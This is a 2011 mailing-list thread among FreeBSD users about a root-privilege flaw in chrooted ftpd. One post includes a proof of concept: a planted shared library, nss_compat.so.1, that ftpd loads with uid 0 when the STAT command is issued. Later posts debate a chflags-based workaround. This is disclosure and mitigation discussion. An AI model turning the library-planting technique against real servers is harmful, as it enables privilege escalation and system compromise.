Saw this on FD... Anyone know any more details about this ? http://lists.grok.org.uk/pipermail/full-disclosure/2011-November/084372.html ---Mike -- ------------------- Mike Tancsa, tel +1 519 651 3400 Sentex Communications, mike@sentex.net Providing Internet services since 1994 www.sentex.net Cambridge, Ontario Canada http://www.tancsa.com/
> Saw this on FD... Anyone know any more details about this ? > http://lists.grok.org.uk/pipermail/full-disclosure/2011-November/084372.htmlThis is a well known hazard of chrooting to directories controlled by unprivileged users. In this case, vulnerability exists because ftpd calls /bin/ls with uid=0 and euid!=0 when STAT command is issued, and nss_compat.so is loaded by libc regardless of elevated privileges. This can be proven by creating dummy ~/lib/nss_compat.so.1: [venglin@lagoon ~/lib]$ cat dummy.c #include <stdio.h> #include <fcntl.h> void _init() { FILE *fp = fopen("asdf", "w+"); fprintf(fp, "%d %d\n", getuid(), geteuid()); } [venglin@lagoon ~/lib]$ cc -o dummy.o -c dummy.c -fPIC [venglin@lagoon ~/lib]$ cc -shared -Wl,-soname,dummy.so -o dummy.so dummy.o -nostartfiles [venglin@lagoon ~/lib]$ mv dummy.so nss_compat.so.1 And after calling STAT command: [venglin@lagoon ~/lib]$ cat ~/asdf 0 3000 BTW. This vulnerability affects only configurations, where /etc/ftpchroot exists or anonymous user is allowed to create files inside etc and lib dirs. -- * Fido: 2:480/124 ** WWW: http://www.frasunek.com ** NICHDL: PMF9-RIPE * * Jabber ID: venglin@nette.pl ** PGP ID: 2578FCAD ** HAM-RADIO: SQ5JIV *
On Fri, Dec 9, 2011 at 12:04 AM, <gabor@zahemszky.hu> wrote:> Hi! > > Are the following steps enough to prevent me? > > # for user in user1 user2 .... ; do > mkdir -p ~$user/lib ~$user/usr/lib ~$user/etc > chflags sunlink,schg ~$user/lib ~$user/usr ~$user/usr/lib ~$user/etc > done > #Yes that should be sufficient workaround. Cheers, -- Xin LI <delphij@delphij.net> https://www.delphij.net/ FreeBSD - The Power to Serve! Live free or die
09.12.2011 15:25, Xin LI ?????:> On Fri, Dec 9, 2011 at 12:04 AM, <gabor@zahemszky.hu> wrote: >> Hi! >> >> Are the following steps enough to prevent me? >> >> # for user in user1 user2 .... ; do >> mkdir -p ~$user/lib ~$user/usr/lib ~$user/etc >> chflags sunlink,schg ~$user/lib ~$user/usr ~$user/usr/lib ~$user/etc >> done >> # > > Yes that should be sufficient workaround.Why /lib and /usr/lib only? Eugene Grosbein
On Fri, 09 Dec 2011 15:39:15 +0700, Eugene Grosbein wrote:> 09.12.2011 15:25, Xin LI ?????: >> On Fri, Dec 9, 2011 at 12:04 AM, <gabor@zahemszky.hu> wrote: >>> Hi! >>> >>> Are the following steps enough to prevent me? >>> >>> # for user in user1 user2 .... ; do >>> mkdir -p ~$user/lib ~$user/usr/lib ~$user/etc >>> chflags sunlink,schg ~$user/lib ~$user/usr ~$user/usr/lib >>> ~$user/etc >>> done >>> # >> >> Yes that should be sufficient workaround. > > Why /lib and /usr/lib only???? /lib, /usr/lib and /etc. Which directory is missing? G?bor < Gabor at Zahemszky dot HU >
09.12.2011 19:24, gabor@zahemszky.hu ?????:> On Fri, 09 Dec 2011 15:39:15 +0700, Eugene Grosbein wrote: >> 09.12.2011 15:25, Xin LI ?????: >>> On Fri, Dec 9, 2011 at 12:04 AM, <gabor@zahemszky.hu> wrote: >>>> Hi! >>>> >>>> Are the following steps enough to prevent me? >>>> >>>> # for user in user1 user2 .... ; do >>>> mkdir -p ~$user/lib ~$user/usr/lib ~$user/etc >>>> chflags sunlink,schg ~$user/lib ~$user/usr ~$user/usr/lib >>>> ~$user/etc >>>> done >>>> # >>> >>> Yes that should be sufficient workaround. >> >> Why /lib and /usr/lib only? > > ??? /lib, /usr/lib and /etc. > > Which directory is missing?I do not know and therefore, ask. What guarantees that no other directory may be used to load a library from? Eugene Grosbein